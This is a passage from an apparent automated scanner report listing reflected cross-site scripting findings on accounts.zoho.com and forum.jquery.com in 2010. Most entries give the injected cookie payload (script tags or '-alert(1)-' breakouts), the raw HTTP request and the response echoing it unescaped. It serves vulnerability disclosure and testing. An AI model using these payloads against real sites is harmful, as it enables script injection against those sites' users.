Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /login HTTP/1.1
Host: accounts.zoho.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=56D46261849046C7540AB31DBC7DA0AD; iamcsr=8ef599d1-4822-4851-912e-a79d06e36308f9241'-alert(1)-'223bb6c4a58; IAMAGENTTICKET=;

Response

HTTP/1.1 200 OK
P3P: CP="CAO PSA OUR"
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:47 GMT
Connection: close
Server: ZWS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">

<html>
<head>
<title>Zoho Accounts</title>
<style type="text
...[SNIP]...
rlencoded; charset=UTF-8');objHTTP.send(params);eval(objHTTP.responseText);}

function resendConfirmation(eid) {
   var csrfParam = 'iamcsrcoo=8ef599d1-4822-4851-912e-a79d06e36308f9241'-alert(1)-'223bb6c4a58';
   var params = "email="+euc(eid.toLowerCase())+"&"+csrfParam;//No I18N
   sendRequest("/u/em/confirm", params);//No I18N
   return false;
}

    function
...[SNIP]...

1.255. http://forum.jquery.com/ [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 985a5"-alert(1)-"e07f02016a2 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Accept: */*
Referer: http://jquery.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forum.jquery.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmb=44433727.3.10.1289872970; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=44433727; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb985a5"-alert(1)-"e07f02016a2; JSESSIONID=AD357A14E7FC954350E517D74E9E548F

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 16 Nov 2010 02:08:14 GMT
Server: Apache-Coyote/1.1
Content-Length: 412028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb985a5"-alert(1)-"e07f02016a2";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.256. http://forum.jquery.com/ [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dde1c"><script>alert(1)</script>bcffdbcc616 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Accept: */*
Referer: http://jquery.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forum.jquery.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmb=44433727.3.10.1289872970; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=44433727; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbbdde1c"><script>alert(1)</script>bcffdbcc616; JSESSIONID=AD357A14E7FC954350E517D74E9E548F

Response

1.257. http://forum.jquery.com/about-the-jquery-forum [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/about-the-jquery-forum

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad6fc"-alert(1)-"9c813ee7210 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /about-the-jquery-forum HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbbad6fc"-alert(1)-"9c813ee7210;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=70920BB9B56BD3667DF2EE884DAFA067; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:39:55 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbbad6fc"-alert(1)-"9c813ee7210";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.258. http://forum.jquery.com/about-the-jquery-forum [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/about-the-jquery-forum

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5aeb8"><script>alert(1)</script>184832e7612 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=7EB7A963D70AA3E56FC0F07732D1397D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:39:22 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb5aeb8"><script>alert(1)</script>184832e7612"/>
...[SNIP]...

1.259. http://forum.jquery.com/developing-jquery-mobile [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/developing-jquery-mobile

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d758b"-alert(1)-"e6427185296 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /developing-jquery-mobile HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbbd758b"-alert(1)-"e6427185296;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=B1851D64A27F36B930DCAEF3898C9B6D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:40:17 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbbd758b"-alert(1)-"e6427185296";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.260. http://forum.jquery.com/developing-jquery-mobile [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/developing-jquery-mobile

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 311ee"><script>alert(1)</script>6cdb7c6000b was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=23396E918BBDD8904130A3BB33771E7E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:39:53 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb311ee"><script>alert(1)</script>6cdb7c6000b"/>
...[SNIP]...

1.261. http://forum.jquery.com/developing-jquery-plugins [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/developing-jquery-plugins

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be553"><script>alert(1)</script>91e09562bc7 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /developing-jquery-plugins HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbbbe553"><script>alert(1)</script>91e09562bc7;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=4C814B757E3C656BBED434A09213F398; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:38:50 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbbbe553"><script>alert(1)</script>91e09562bc7"/>
...[SNIP]...

1.262. http://forum.jquery.com/developing-jquery-plugins [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/developing-jquery-plugins

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 946bd"-alert(1)-"b994d6d8afa was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=328343C6CE39774F99AF260DC4A2C71E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:39:28 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb946bd"-alert(1)-"b994d6d8afa";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.263. http://forum.jquery.com/jquery-conferences [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/jquery-conferences

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57d12"-alert(1)-"7bb6dad8c9c was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /jquery-conferences HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb57d12"-alert(1)-"7bb6dad8c9c;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=338F51F237A44EA549C93AB697AB2730; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:39:37 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb57d12"-alert(1)-"7bb6dad8c9c";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.264. http://forum.jquery.com/jquery-conferences [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/jquery-conferences

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d363b"><script>alert(1)</script>211d0662176 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=01624F2138FC399220BA54BECC84BB4E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:39:05 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbbd363b"><script>alert(1)</script>211d0662176"/>
...[SNIP]...

1.265. http://forum.jquery.com/jquery-mobile [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/jquery-mobile

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57f5f"-alert(1)-"7e67dc4d73b was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /jquery-mobile HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb57f5f"-alert(1)-"7e67dc4d73b;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=D49EBF72C109638FD22383D812F53A25; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:40:07 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb57f5f"-alert(1)-"7e67dc4d73b";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.266. http://forum.jquery.com/jquery-mobile [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/jquery-mobile

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b65d"><script>alert(1)</script>760f29b715b was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=05D688205BB60284C4BFE675C84FCB0F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:39:36 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<input type="hidden" name="zdrpn" value="62213a1a-db44-432f-a0e7-c5eb57ba4dbb7b65d"><script>alert(1)</script>760f29b715b"/>
...[SNIP]...

1.267. http://forum.jquery.com/portalLogin.do [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/portalLogin.do

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76c08"-alert(1)-"b866f31e11f was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /portalLogin.do?serviceurl=/&forumGroupUrl=jquery HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb76c08"-alert(1)-"b866f31e11f;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:17:21 GMT
Server: Apache-Coyote/1.1
Connection: close

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

Login Pag
...[SNIP]...
if(typeof postToForum != "undefined")
{
options.postToForum = postToForum;
}
options["zdrpn"] = "62213a1a-db44-432f-a0e7-c5eb57ba4dbb76c08"-alert(1)-"b866f31e11f";
$.ajax(
{
url: "/sendFeedback.do",
type: "POST",
data: options,
error: function (err,
...[SNIP]...

1.268. http://forum.jquery.com/qunit-and-testing [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/qunit-and-testing

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9c6a"-alert(1)-"44a5be9428e was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /qunit-and-testing HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbbf9c6a"-alert(1)-"44a5be9428e;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=D176721E9DB119D707310F040EFB1B5E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:39:51 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
= "jquery";
var maxAttachmentsPerPost = "3";
var portalPlanType = "7";
var portalPlanIndex = "9";
var csrfParamName = "zdrpn";
var csrfToken = "62213a1a-db44-432f-a0e7-c5eb57ba4dbbf9c6a"-alert(1)-"44a5be9428e";
var csrfOptions = {};
csrfOptions[csrfParamName]=csrfToken;
var currLocal = "en";
var serverURL = "http://forum.jquery.com";
var defaultDomain = "discussions.zoho.com";
var s
...[SNIP]...

1.269. http://forum.jquery.com/qunit-and-testing [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/qunit-and-testing

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 859be"><script>alert(1)</script>42f5fe768cd was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=215B49D7DC19D8441A74BAF74BF9C016; Path=/
Content-Type: text/html;charset=UTF-8
